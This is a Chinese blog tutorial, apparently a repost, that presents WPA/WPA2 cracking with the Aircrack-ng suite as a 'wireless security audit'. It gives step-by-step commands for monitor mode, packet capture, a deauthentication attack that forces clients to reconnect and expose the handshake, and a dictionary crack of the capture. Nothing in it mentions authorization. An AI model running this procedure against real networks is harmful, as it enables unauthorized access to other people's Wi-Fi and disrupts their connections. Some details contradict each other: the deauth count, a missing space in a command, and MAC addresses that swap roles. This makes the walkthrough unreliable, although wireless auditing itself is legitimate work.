使用Aircrack-ng进行无线安全审计

设置监听模式

激活网卡

ifconfig wlan0 up

结束占用网络接口的进程

airmon-ng check kill

开启监听模式

airmon-ng start wlan0

查看网卡是否成功开启了监听模式

iwconfig

Mode状态为Monitor为开启成功,Managed为不成功。

捕获数据包

此处须填写监听模式的接口,一般为wlan0mon。

airodump-ng wlan0mon

按Ctrl+C可停止扫描。 

airodump-ng -t WPA2 wlan0mon                   #仅捕获WPA2加密方式的数据包
airodump-ng --bssid 00:25:00:FF:94:73 wlan0mon #指定捕获BSSID的包
airodump-ng -N Tech-For-Test wlan0mon          #指定捕获ESSID的包
airodump-ng -c 6 wlan0mon                      #捕获信道为6的包

保存捕获的数据包

airodump-ng -w packet wlan0mon #将捕获的数据包保存到名为packet的文件中

读取数据包

airodump-ng -r xxx.pcap        #读取名为xxx.pcap的数据包

这里我们使用以下命令:

airodump-ng -c 11 -w AirCrk --bssid F0:DB:F8:0C:0B:28 wlan0mon

                       频道号  写入AirCrk文件

等待右上角出现WPA handshake关键字时说明成功获得到了包含WPA密码的4次握手数据报文,此时可使用aireplay注入。

若没有看到这个提示,可以增加Deauth的发送数量。

其他导致无法获取握手报文的原因(摘自Longas的《Linux-BT4黑客手册》):

1.可能该无线网卡对这些无线工具的支持性不好,比如很多笔记本自带的无线网卡支持性就不好。

2.无线接入点自身问题,有的AP在遭受攻击后会短时间内失去响应,需重启后等待片刻才能恢复正常工作状态。

注入数据包

目的是强制客户端重新连接,从而获取WPA/WPA2握手数据包。(需airodump-ng处于运行状态)

重新打开一个终端。

-0表示Deauth攻击模式 5表示发送次数  

aireplay-ng -0 1 -a A4:2B:8C:7D:98:7D-c F0:DB:F8:0C:0B:28 wlan0mon #使用Deauth攻击模式 破解WPA/WPA2包。

                              BSSID mac地址             STATION mac地址 

最后使用加载字典对cap数据包进行破解。

aircrack-ng -w dic.txt -b F0:DB:F8:0C:0B:28 log-01.cap

如果字典比较大,跑起来可能需要很久,这个过程是很考验RP的,破解成功后会出现下图界面:

作者:AirCrk
原文地址:http://www.cnblogs.com/AirCrk/articles/5652589.html

原文地址:https://www.cnblogs.com/AirCrk/p/5652589.html